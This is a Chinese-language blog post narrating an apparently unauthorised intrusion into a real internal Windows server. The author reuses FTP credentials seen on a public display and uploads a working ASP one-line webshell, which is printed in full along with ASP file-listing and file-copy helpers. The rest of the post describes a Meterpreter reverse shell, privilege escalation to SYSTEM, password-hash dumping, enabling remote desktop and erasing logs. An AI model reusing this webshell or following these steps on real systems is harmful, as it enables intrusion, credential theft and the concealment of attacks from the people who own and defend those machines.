<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="利用Metasploit和Asp木马进行某内网服务器渗透并提权实战, A Randint Day&#39;s Lab">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>利用Metasploit和Asp木马进行某内网服务器渗透并提权实战 | A Randint Day&#39;s Lab</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>
	<script data-ad-client="ca-pub-6866791749878424" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    
<meta name="generator" content="Hexo 6.2.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">A Randint Day's Lab</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="" class="waves-effect waves-light">

      
      <i class="fas fa-list" style="zoom: 0.6;"></i>
      
      <span>Medias</span>
      <i class="fas fa-chevron-down" aria-hidden="true" style="zoom: 0.6;"></i>
    </a>
    <ul class="sub-nav menus_item_child ">
      
      <li>
        <a href="/games.html">
          
          <span>Games</span>
        </a>
      </li>
      
      <li>
        <a href="/movies.html">
          
          <span>Movies</span>
        </a>
      </li>
      
      <li>
        <a href="/books.html">
          
          <span>Books</span>
        </a>
      </li>
      
    </ul>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>

<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">A Randint Day's Lab</div>
        <div class="logo-desc">
            
            That is not dead which can eternal lie, and with strange aeons even death may die.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="javascript:;">
			
				<i class="fa-fw fas fa-list"></i>
			
			Medias
			<span class="m-icon"><i class="fas fa-chevron-right"></i></span>
		</a>
            <ul  style="background:  ;" >
              
                <li>   
				
                  <a href="/games.html " style="margin-left:75px";>
				  
		          <span>Games</span>
                  </a>
                </li>
              
                <li>   
				
                  <a href="/movies.html " style="margin-left:75px";>
				  
		          <span>Movies</span>
                  </a>
                </li>
              
                <li>   
				
                  <a href="/books.html " style="margin-left:75px";>
				  
		          <span>Books</span>
                  </a>
                </li>
               
            </ul>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/arandintday" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>

        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/arandintday" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://s3.ax1x.com/2020/11/14/DChNQg.png')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">利用Metasploit和Asp木马进行某内网服务器渗透并提权实战</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/Linux/">
                                <span class="chip bg-color">Linux</span>
                            </a>
                        
                            <a href="/tags/%E6%B8%97%E9%80%8F/">
                                <span class="chip bg-color">渗透</span>
                            </a>
                        
                            <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">网络安全</span>
                            </a>
                        
                            <a href="/tags/Kali/">
                                <span class="chip bg-color">Kali</span>
                            </a>
                        
                            <a href="/tags/Metasploit/">
                                <span class="chip bg-color">Metasploit</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E5%B9%B2%E8%B4%A7/" class="post-category">
                                干货
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2020-11-14
                </div>
                

                

                

                

                
            </div>

        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <p>声明：本文仅供技术研究交流之用，请遵守当地相关法律法规！</p>
<p>声明2：本人作为一个菜鸟级脚本小子姿势水平有限，难免会出现疏漏和错误，我还得再学习一个</p>
<p><img src="https://s3.ax1x.com/2020/11/14/DCfRat.jpg" alt=""></p>
<h2 id="0x01：起因"><a href="#0x01：起因" class="headerlink" title="0x01：起因"></a>0x01：起因</h2><p>我偶然在[数据删除]发现了一个出故障的信息发布大屏，系统是win7，正在运行一个cmd窗口，命令是登录一个地址为192.168.██.███的ftp服务器。cmd里的ftp登录指令账户和密码居然是没有加密的，于是通过此渠道获得了账户和密码，分别为gjzx和███2013<br><img src="https://s3.ax1x.com/2020/11/14/DCXtp9.jpg" alt="如图"></p>
<p>试着在自己电脑上登录了一下，成功，不过很可惜没什么有意思的东西<br><img src="https://s3.ax1x.com/2020/11/14/DCvjFU.png" alt="ftp服务器"></p>
<h2 id="0x02：初步信息收集"><a href="#0x02：初步信息收集" class="headerlink" title="0x02：初步信息收集"></a>0x02：初步信息收集</h2><p>既然偶然收集到了密码，用户名和IP地址，那下一步自然是对靶机进行信息搜集了。直接开kali上nmap</p>
<p>nmap扫描指定IP的所有信息：</p>
<p><code>nmap -A 192.168.██.███</code></p>
<p>nmap扫描结果：<br><img src="https://s3.ax1x.com/2020/11/14/DCzicj.png" alt="nmap扫描结果"><br>服务器开放了445，80，21，135等端口，系统大概率可能为Windows Server 2012 R2</p>
<p>既然服务器开放了80端口，说明它可以用web浏览器访问，于是尝试了一下访问，结果发现需要密码和用户名，尝试了gjzx和███2013，居然成功登录。。。这个管理员属实鬼才，把两个端口的密码和用户名设成同一个。。。<br><img src="https://s3.ax1x.com/2020/11/14/DCzjxJ.png" alt="这个服务器的web界面"><br>这个界面展示的就是刚刚ftp服务器里的那几张图片，事情变得有意思了起来。于是右键，显示图片地址，发现图片地址为192.168.██.███/xin██████/███.jpg，不就是ftp根目录么！</p>
<h2 id="0x03：获取webshell"><a href="#0x03：获取webshell" class="headerlink" title="0x03：获取webshell"></a>0x03：获取webshell</h2><p>有ftp了，有网络权限了，那肯定得用大名鼎鼎的文件上传漏洞了，先试试上传php版的一句话木马到ftp，输入地址栏，访问，结果提示我500服务器错误，看来php马被服务器过滤掉了。</p>
<p>再试试asp版的一句话小马，上传，进web页面访问。。。成功拿到webshell！<br>我用的asp一句话小马：</p>
<pre class=" language-html"><code class="language-html"><span class="token doctype">&lt;!DOCTYPE html></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>html</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>body</span><span class="token punctuation">></span></span>

&lt;%=server.createobject("wsc"+"ript.shell").exec("cmd.exe /c "&amp;request("c")).stdout.readall%>

<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>body</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>html</span><span class="token punctuation">></span></span></code></pre>
<p>webshell界面：<br><img src="https://s3.ax1x.com/2020/11/14/DPpN1e.png" alt="webshell"></p>
<h2 id="0x04：进阶信息收集"><a href="#0x04：进阶信息收集" class="headerlink" title="0x04：进阶信息收集"></a>0x04：进阶信息收集</h2><p>拿到webshell先看看进程列表<br><code>tasklist</code>：<br><img src="https://s3.ax1x.com/2020/11/14/DP9VHI.png" alt="进程列表"><br>看了下，这个服务器并没有运行任何安全软件，管理员工资-1000</p>
<p>查看用户<br><code>net user</code>：<br><img src="https://s3.ax1x.com/2020/11/14/DP9sbR.png" alt="查看用户"><br>嗯，一个gjzx（我们现在正在用的账户），一个管理员Administrator和一个被关闭的Guest</p>
<p>查看系统信息<br><code>systeminfo</code>：<br><img src="https://s3.ax1x.com/2020/11/14/DPPimd.png" alt="查看系统信息"><br>这个机子居然是个VMware虚拟机，管理员不用扣工资了，不过这样乐子就少了很多。系统正如nmap探测的那样是WinServer2012R2，由于我一个脚本小子对补丁名不太懂，所以还得需要更详细的信息</p>
<p>查看补丁信息<br><code>wmic qfe get Description,HotFixID,InstalledOn</code>：<br><img src="https://s3.ax1x.com/2020/11/14/DPiXRK.png" alt="查看补丁信息"><br>发现这个机子基本上只装了2015年以前的补丁，所以可以利用2015年以后新发现的漏洞来进行渗透操作</p>
<p>环境变量<br><code>Set</code>：<br><img src="https://s3.ax1x.com/2020/11/14/DPFesg.png" alt="环境变量"></p>
<p>webshell的权限很低，经过测试，这个webshell只能对C:\和D:\的根目录有完全读写执行权限，C:\Windows\只有读和运行权限，对D:\的web文件夹完全没有权限</p>
<p>于是再次上传一个基于vbs的asp文件目录遍历器，随后就找到了ftp文件夹所在的位置在D:\web\xin██████目录下。</p>
<p>asp文件遍历：</p>
<pre class=" language-html"><code class="language-html"><span class="token doctype">&lt;!DOCTYPE html></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>html</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>body</span><span class="token punctuation">></span></span>
&lt;%
dim fold_name, command_
fold_name=Request.QueryString("f")
command_=Request.QueryString("c")
Function ShowFileList(folderspec)
Dim fso, f, f1, fm, fc, fd, s, p, N, M, s1, s2, s3, p1, p2, p3
Set fso = CreateObject("scripting.FileSystemObject")
Set f = fso.GetFolder(folderspec)
Set fc = f.Files
Set fd = f.SubFolders
N = 0
For Each f1 in fc
N = N + 1
s1 = s&amp; f1.name 
s2 = "第 "&amp;N&amp;" 个："&amp;s1&amp;vbCrLf
s3 = s3+s2
Next
M = 0
For Each fm in fd
M = M + 1
p1 = p&amp; fm.name 
p2 = "第 "&amp;M&amp;" 个："&amp;p1&amp;vbCrLf
p3 = p3+p2
Next
ShowFileList = "该文件夹中总共 "&amp;N&amp;" 个文件,"&amp;M&amp;"个文件夹："&amp;vbCrLf&amp;s3&amp;vbcrlf&amp;vbCrLf&amp;p3&amp;vbcrlf
End Function
file=ShowFileList(fold_name)
response.write(file)
%>

<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>body</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>html</span><span class="token punctuation">></span></span></code></pre>
<h2 id="0x05：利用msf进行渗透并拿到meterpreter控制台"><a href="#0x05：利用msf进行渗透并拿到meterpreter控制台" class="headerlink" title="0x05：利用msf进行渗透并拿到meterpreter控制台"></a>0x05：利用msf进行渗透并拿到meterpreter控制台</h2><p>上一步中收集到的关键信息如下：</p>
<ul>
<li><p>网站的根目录：D:\web</p>
</li>
<li><p>ftp的根目录：D:\web\xin██████\</p>
</li>
<li><p>系统：WinServer2012R2 64位</p>
</li>
<li><p>补丁：2015年以前</p>
</li>
<li><p>安全软件：无</p>
</li>
<li><p>用户：gjzx，Administrator</p>
</li>
<li><p>webshell的可执行目录：D:,C:\</p>
</li>
<li><p>asp权限：较高，允许对webshell无权操作的目录进行读写操作</p>
</li>
<li><p>是否可以联通攻击机：是</p>
</li>
</ul>
<p>于是我下面的思路就是利用msfvenom生成一个meterpreter木马，上传到服务器根目录中，再利用asp马将其拷贝到webshell可执行的D:\根目录下，利用webshell执行</p>
<p>asp文件拷贝：</p>
<pre class=" language-html"><code class="language-html"><span class="token doctype">&lt;!DOCTYPE html></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>html</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>body</span><span class="token punctuation">></span></span>

&lt;%
Dim fso,src,dest
src=Request.QueryString("s")
dest=Request.QueryString("d")
Set fso = CreateObject("Scripting.FileSystemObject")
fso.getfile(src).copy(dest)
response.write(err.number)
%>

<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>body</span><span class="token punctuation">></span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>html</span><span class="token punctuation">></span></span></code></pre>
<p>于是进入kali，打开msfconsole，根据靶机系统生成合适的meterpreter木马，这里我选择的是针对64位Windows的反弹TCP端口木马。由于靶机没有装任何杀软，所以不用做免杀处理，舒坦。然后上传到ftp服务器目录里，再利用asp把meterpreter木马拷到D:\下，再进入webshell执行木马，连接成功！</p>
<p><img src="https://s3.ax1x.com/2020/11/14/DPA7ZQ.png" alt="生成meterpreter木马并开始本地监听"></p>
<p>不过中间有个小插曲就是第一次连接发现虽然系统已经显示建立了session1但是meterpreter控制台却迟迟没弹出来，原因就是因为必须要把meterpreter的payload和本地的payload设定为同种，否则就会出现这种情况。<br><img src="https://s3.ax1x.com/2020/11/14/DPZCCR.png" alt="成功得到靶机的meterpreter控制台"><br>输入getuid发现gjzx这个账户权限并不是管理员，且getsystem也不能用，因此需要提权</p>
<h2 id="0x06：利用msf提权"><a href="#0x06：利用msf提权" class="headerlink" title="0x06：利用msf提权"></a>0x06：利用msf提权</h2><p>因为之前在我自己电脑上测试时用msf的bypassuac来提权很方便，结果在这个机子上碰了钉子<br><img src="https://s3.ax1x.com/2020/11/14/DPZxQP.png" alt="bypassuac失败"><br>原因就是bypassuac大多数都必须需要meterpreter的用户属于管理员用户组才能提权，因此得换个思路，网上一搜发现可以利用msf的本地提权漏洞</p>
<p>于是控制台输入<br><code>search local/ms</code><br><img src="https://s3.ax1x.com/2020/11/14/DPe3WR.png" alt="可用的payload"></p>
<p>因为靶机只装了15年以前的补丁，所以选择其中一个比较新的尝试了一下<br><img src="https://s3.ax1x.com/2020/11/14/DPeHXV.png" alt="提权成功"><br>成功提权到SYSTEM，并且成功将gjzx权限提到管理员级别，然后就可以随便搞事了</p>
<h2 id="0x07：尝试获取其他账户hash密码和明文密码"><a href="#0x07：尝试获取其他账户hash密码和明文密码" class="headerlink" title="0x07：尝试获取其他账户hash密码和明文密码"></a>0x07：尝试获取其他账户hash密码和明文密码</h2><p>试了下跑明文密码结果失败了，hash值倒是出来了，但必须得用字典跑<br><img src="https://s3.ax1x.com/2020/11/14/DPmUcq.png" alt="用kiwi跑明文和hash"></p>
<h2 id="0x08：远程桌面登录"><a href="#0x08：远程桌面登录" class="headerlink" title="0x08：远程桌面登录"></a>0x08：远程桌面登录</h2><p>在06提权以后再<br><code>run getgui –e</code><br>开启远程桌面服务以后就可以直接进行远程桌面了，不过我又遇到了一个小插曲，就是我试图连接远程桌面时它提示我CreedSSP加密数据库修正，结果连接失败，网上搜了一下，最后根据<a href="https://www.cnblogs.com/jinanxiaolaohu/p/13111721.html" target="_blank" rel="noopener">这个教程</a>成功以gjzx的身份进入了靶机的远程桌面<br><img src="https://s3.ax1x.com/2020/11/14/DPnErV.png" alt=""></p>
<h2 id="0x09：后续工作"><a href="#0x09：后续工作" class="headerlink" title="0x09：后续工作"></a>0x09：后续工作</h2><p>完成以后不能被别人发现踪迹，运行<br><code>clearev</code><br>清理掉痕迹就可以收工了<br><img src="https://s3.ax1x.com/2020/11/14/DPnNIe.png" alt="藏好自己，做好清理"></p>
<h2 id="0x0A：总结"><a href="#0x0A：总结" class="headerlink" title="0x0A：总结"></a>0x0A：总结</h2><p>别因为不方便就彻底关掉Windows更新和Windows Defender，UAC千万不要轻易关掉，勒索病毒之所以一堆单位和高校中招还不是因为安全意识不高，装完系统就关Windows Defender和Windows更新或者万年不更新补丁，病毒不勒索你才怪。还有，Windows安全性实在是太低了，如果从事的工作涉及到国家或者商业秘密的话还是用Linux当主力靠谱</p>
<h2 id="0x0B：参考资料"><a href="#0x0B：参考资料" class="headerlink" title="0x0B：参考资料"></a>0x0B：参考资料</h2><ul>
<li><a href="https://cloud.tencent.com/developer/article/1472206" target="_blank" rel="noopener">MSF命令大全1</a></li>
<li><a href="https://cloud.tencent.com/developer/article/1472205" target="_blank" rel="noopener">MSF命令大全2</a></li>
<li><a href="https://cloud.tencent.com/developer/article/1472202" target="_blank" rel="noopener">MSF命令大全3</a></li>
<li><a href="https://www.cnblogs.com/jinanxiaolaohu/p/13111721.html" target="_blank" rel="noopener">Windows远程时提示CredSSP加密数据库修正问题的简单处理</a></li>
<li><a href="https://xz.aliyun.com/t/8091" target="_blank" rel="noopener">Windows系统提权webshell信息收集指令</a></li>
<li><a href="https://misakikata.github.io/2019/05/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" target="_blank" rel="noopener">文件上传漏洞</a></li>
<li><a href="https://blog.csdn.net/qq284489030/article/details/90031998" target="_blank" rel="noopener">作为内网杀手的metasploit如何在外网使用呢？</a></li>
<li><a href="https://m.freebuf.com/sectool/118714.html" target="_blank" rel="noopener">Meterpreter免杀技巧分享</a></li>
<li><a href="https://www.cnblogs.com/backlion/p/9484949.html" target="_blank" rel="noopener">Meterpreter命令详解</a></li>
<li><a href="https://blog.csdn.net/weixin_39997829/article/details/83656134" target="_blank" rel="noopener">msf拿到windows的shell显示乱码解决方法</a></li>
<li><a href="https://www.pa55w0rd.online/msfvenom%20_use/" target="_blank" rel="noopener">msfvenom使用</a></li>
<li><a href="https://blog.csdn.net/whatday/article/details/82904623" target="_blank" rel="noopener">metasploit msfvenom使用实例</a></li>
<li><a href="https://m.freebuf.com/sectool/154752.htm" target="_blank" rel="noopener">手把手教你如何利用Meterpreter渗透Windows系统</a></li>
<li><a href="https://cjjkkk.github.io/meterpreter-UACgetSystem/" target="_blank" rel="noopener">Metasploit生成木马文件获取shell和UAC提权操作</a></li>
<li><a href="https://blog.csdn.net/l1028386804/article/details/86008037" target="_blank" rel="noopener">渗透之——MSF—Meterpreter清理日志</a></li>
<li><a href="https://zhuanlan.zhihu.com/p/34085550" target="_blank" rel="noopener">Win提权思路，方法，工具（小总结）</a></li>
<li><a href="https://www.geek-share.com/detail/2780656824.html" target="_blank" rel="noopener">vbs 复制指定文件到指定目录下</a></li>
<li><a href="https://www.cnblogs.com/lhws/p/4024208.html" target="_blank" rel="noopener">net user命令集合详解</a></li>
<li><a href="https://yinwc.github.io/2019/11/20/%E6%8F%90%E6%9D%83%E7%AC%94%E8%AE%B0/" target="_blank" rel="noopener">提权笔记</a></li>
<li><a href="https://www.webshell.cc/2366.html" target="_blank" rel="noopener">号称“最全的WEBSHELL提权大大全</a></li>
<li><a href="https://xz.aliyun.com/t/8091" target="_blank" rel="noopener">提权学习之旅——Windows操作系统提权</a></li>
<li><a href="https://blog.csdn.net/qq_38626043/article/details/109388147" target="_blank" rel="noopener">Metasploit-进阶用户密码与mimikatz模块kiwi模块</a></li>
<li><a href="https://myt0.com/2019/03/03/windows%E5%90%8E%E6%B8%97%E9%80%8F%E5%88%A9%E7%94%A8/" target="_blank" rel="noopener">windows后渗透利用</a><br><img src="https://s3.ax1x.com/2020/11/14/DPnzsx.jpg" alt=""><br>搞事成功，玩CSGO去了（逃</li>
</ul>

            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://arandintday.github.io" rel="external nofollow noreferrer">A Randint Day</a>
                    </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://arandintday.github.io/2020/11/14/hacaswinserver/">http://arandintday.github.io/2020/11/14/hacaswinserver/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY-SA 4.0</a>
                    许可协议。转载请注明来源
                    <a href="http://arandintday.github.io" target="_blank">A Randint Day</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/Linux/">
                                    <span class="chip bg-color">Linux</span>
                                </a>
                            
                                <a href="/tags/%E6%B8%97%E9%80%8F/">
                                    <span class="chip bg-color">渗透</span>
                                </a>
                            
                                <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">网络安全</span>
                                </a>
                            
                                <a href="/tags/Kali/">
                                    <span class="chip bg-color">Kali</span>
                                </a>
                            
                                <a href="/tags/Metasploit/">
                                    <span class="chip bg-color">Metasploit</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">

<div id="article-share">
    
    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
